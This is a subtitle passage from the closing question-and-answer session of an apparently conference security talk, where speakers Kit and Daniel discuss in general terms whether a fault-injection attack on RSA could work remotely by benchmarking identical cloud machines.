00:47:55,430 --> 00:48:01,799
funny talk. If I understood, you're right,
it means to really be able to exploit
550
00:48:01,799 --> 00:48:07,249
this. You need to do some benchmarking on
the machine that you want to exploit. Do
551
00:48:07,249 --> 00:48:15,239
you see any way to convert this to a
remote exploit? I mean, that to me, it
552
00:48:15,239 --> 00:48:19,650
seems you need physical access right now
because you need to reboot the machine.
553
00:48:19,650 --> 00:48:23,859
Kit: If you've done benchmarking on an
identical machine, I don't think you would
554
00:48:23,859 --> 00:48:27,039
have to have physical access.
Daniel: But you would have to make sure
555
00:48:27,039 --> 00:48:29,549
that it's really an identical machine.
Kit: Yeah.
556
00:48:29,549 --> 00:48:33,499
Daniel: But in the cloud you will find a
lot of identical machines.
557
00:48:33,499 --> 00:48:41,119
Laughter
Herald: Okay, microphone number 4 again.
558
00:48:41,119 --> 00:48:46,059
Daniel: Also, as we said, like the
temperature plays an important role.
559
00:48:46,059 --> 00:48:47,650
Kit: Yeah.
Daniel: You will also in the cloud find a
560
00:48:47,650 --> 00:48:52,390
lot of machines at similar temperatures
Kit: And there was, there is obviously
561
00:48:52,390 --> 00:48:55,569
stuff that we didn't show you. We did
start measuring the total amount of clock
562
00:48:55,569 --> 00:49:00,259
ticks it took to do maybe 10 RSA
encryptions. And then we did start doing
563
00:49:00,259 --> 00:49:03,820
very specific timing attacks. But
obviously it's much easier to just do
564
00:49:03,820 --> 00:49:10,452
10000 of them and hope that one faults.
Herald: All right. Seems there are no
565
00:49:10,452 --> 00:49:13,940
further questions. Thank you very much for
your talk. For your research and for
566
00:49:13,940 --> 00:49:15,140
answering all the questions.
Applause
567
00:49:15,140 --> 00:49:18,529
Kit: Thank you.
Daniel: Thank you.
568
00:49:18,529 --> 00:49:22,479
postroll music
569
00:49:22,479 --> 00:49:48,000
subtitles created by c3subtitles.de
in the year 20??. Join, and help us!